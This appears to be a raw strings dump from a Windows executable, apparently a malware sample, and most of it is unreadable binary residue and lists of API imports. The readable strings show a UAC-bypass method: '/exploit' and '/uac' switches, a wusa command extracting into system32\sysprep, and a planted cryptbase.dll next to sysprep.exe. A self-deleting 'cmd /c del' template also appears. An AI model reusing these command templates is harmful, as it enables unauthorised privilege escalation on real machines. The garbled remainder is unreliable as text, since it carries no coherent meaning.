L!This program cannot be run in DOS mode.
Richdg
`.data
@.rsrc
@.reloc
wwwwwzw
wzwv{w9wkw^ww
|w|<|G|]|B$|W|)|,|
|Q(|(||/|
||jH||?|
|0%|g#|
|;)|\|cL|!|S
||"|=|f||w
CLIENT32
"%s" /exploit
"%s" /uac
Global\AtomFun
sysprep.exe
logonui.exe
utilman.exe
user32.dll
wsprintfA
wvsprintfA
msvcrt.dll
_vscprintf
ComSpec
/c del %s >> NUL
Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}
advapi32.dll
AddMandatoryAce
cmd.exe /C %s
cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep
\system32\sysprep\cryptbase.dll
\system32\sysprep\sysprep.exe
makecab.exe /V1 %s %s
\cryptbase.msu
\cryptbase.dll
\%.8x.tmp
kernel32.dll
IsWow64Process
WinExec
LoadLibraryA
\uxtheme.dll
t@SVWP
`|$0L$8D$4a_^3[
`t$4|$0L$8a_^3[
SVWEV_^[]
V3F4pu^U
|txst0j
3_MbO4puEt
@8E~Bj
EQPEFE
E(9E|_[^
SVY$W3;
3;t`9^
t*W39^
H<ME8PE
EpPEp4
MH4uuu
mEM+H4Mt
Y3}EPSE
EdPEhPElPE\PW}\}l}h}dP
EpPEtPP}t}p6
9}lt=}`
sa9}hu\Pht
_^3[xUE
rZhDNWP
WPWVt$
3@W3t
G@;r3_^]
3@UVWu
ANu^D$
W3G9}`~
G;}`|S
UVW3VVj
UQSW3WWj
Y;r_^[
U@SVW3
EPSSSSSSSSj
j ESP]
EPSEPj
tUEPSSSSSSSh
S]|VW3}h}l;
VEWP;A
E|PWWj
ul}|=
zuXu|j@
tKE|Pu|Vj
V3EWP*
u^EhPj
EdPEPWj
ElPEPup}l
_^[xUXE
SV3u;t
jD_WEVP
EPEPVVVVVV3SGV}
E_^[Ul$
P39}`E
YYEdPEhPP
u|Puduh
uduhP\
}xDNWPu
:.rsrt
EEEPEPu
U0VWj0^Vj
Gdr3_^
W3j[YfEEEEj
E3GPW}fMf]
EPWf]j
EPW]j[XfEj
EPW]_^[
PtAPPu
EEEEPEPP2
PPuuPMt
tAt2t$
r)$ 8@
DDDDDDDDDDDDDD
3@]W|$
:t3^[_
FGIuX^_]
B:t6t:t't
B^_[d0
LockResource
LoadResource
FindResourceA
GetLastError
VirtualQuery
VirtualFree
VirtualAlloc
VirtualProtect
GetProcAddress
LoadLibraryA
IsBadReadPtr
FreeLibrary
Thread32Next
SuspendThread
OpenThread
CloseHandle
Thread32First
CreateToolhelp32Snapshot
LocalFree
GetModuleFileNameA
GetModuleHandleA
GetCommandLineA
GetCurrentProcess
GetVersionExA
SetEvent
OpenEventA
ExitProcess
GetCurrentProcessId
LocalAlloc
WinExec
lstrcatA
GetEnvironmentVariableA
GetShortPathNameA
CreateMutexA
GetCommandLineW
GetTickCount
FlushFileBuffers
WriteFile
CreateFileA
ReadFile
GetFileSize
FindClose
FindFirstFileA
GetExitCodeProcess
WaitForSingleObject
CreateProcessA
Process32Next
Process32First
GetStartupInfoA
GetWindowsDirectoryA
DeleteFileA
GetSystemDirectoryA
GetTempPathA
CopyFileA
CreateEventA
MoveFileA
KERNEL32.dll
wsprintfA
UnregisterClassA
RegisterClassExA
SendInput
LockWorkStation
RegisterWindowMessageA
GetClipboardFormatNameA
USER32.dll
FreeSid
SetSecurityDescriptorSacl
InitializeAcl
SetSecurityDescriptorDacl
InitializeSecurityDescriptor
SetEntriesInAclA
AllocateAndInitializeSid
OpenProcessToken
GetTokenInformation
GetSidSubAuthority
GetSidSubAuthorityCount
CheckTokenMembership
CreateWellKnownSid
ADVAPI32.dll
CommandLineToArgvW
SHELL32.dll
CheckSumMappedFile
imagehlp.dll
IsProcessorFeaturePresent
Y3P0%y4S:
r2\^2\i
M!'yr5$1]KoCHe`b\(~D
O$T7=+B
W%(L6c`Lif
EHq/tpAme2Nx
I{.+g'I^
&m0T\(
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="FALSE"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
aPEexcutbyl
d;C#Wy"{`;
P4GYX%6=u
A$o ',
F@s6>M`
gui(B
F:uzE(BpbR
LR;Z5@Q;uZH
QvPteFJ
EH4Vq6Ppm+
+b1su0t3
\%+[:X
RFW${l
CloseH
CExProcs
mpu@r<NahC
gunDgi
ModulY
`Vsion
(Rhdbi
7S*[v(
VtuaAfc
kPn3(2.
HtpObqu
I(:B,W
8w#(ShEzJ
>RtD2Ihr!vBufo-mw t
/*a>lic
GET za5.0c?nw<ghT
Hrk(?hl_(/h-
uCsr>14
E7uk[hig-F3
/ e x e c u t a b l e
/ e x p l o i t
/ r u n m a i n
C L I E N T 3 2
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ D e s k t o p \ U z g n X G N 8 . e x e
C : \ e 8 7 d 5 4 5 e e b 7 6 f 7 f 7 2 e 4 5 2 1 3 5 f e 2 1 6 4 a 0 7 a 5 b d 8 7 9 d c 2 b 5 1 3 3 1 f 1 3 5 8 a d b b d 6 d 2 2 4
C : \ 2 c f 0 2 9 6 f d c 7 0 b 1 e 8 d a 9 8 4 9 8 b 2 7 4 0 1 f e f b 3 1 6 d a 8 a c 5 4 d 4 1 a f 5 6 3 c 0 2 3 3 f 1 5 4 f d 8 7
C : \ D o c u m e n t s a n d S e t t i n g s \ A d m i n i s t r a t o r \ D e s k t o p \ s l 3 Z c s C e . e x e
C : \ 6 4 4 3 f 3 3 4 9 1 8 a 3 e 7 8 5 d a 9 a 5 2 e c 8 c a 2 7 b f 8 3 d 2 0 d e 7 e b c a 7 3 9 0 a 4 9 d f 1 1 3 8 a b 8 c d 2 6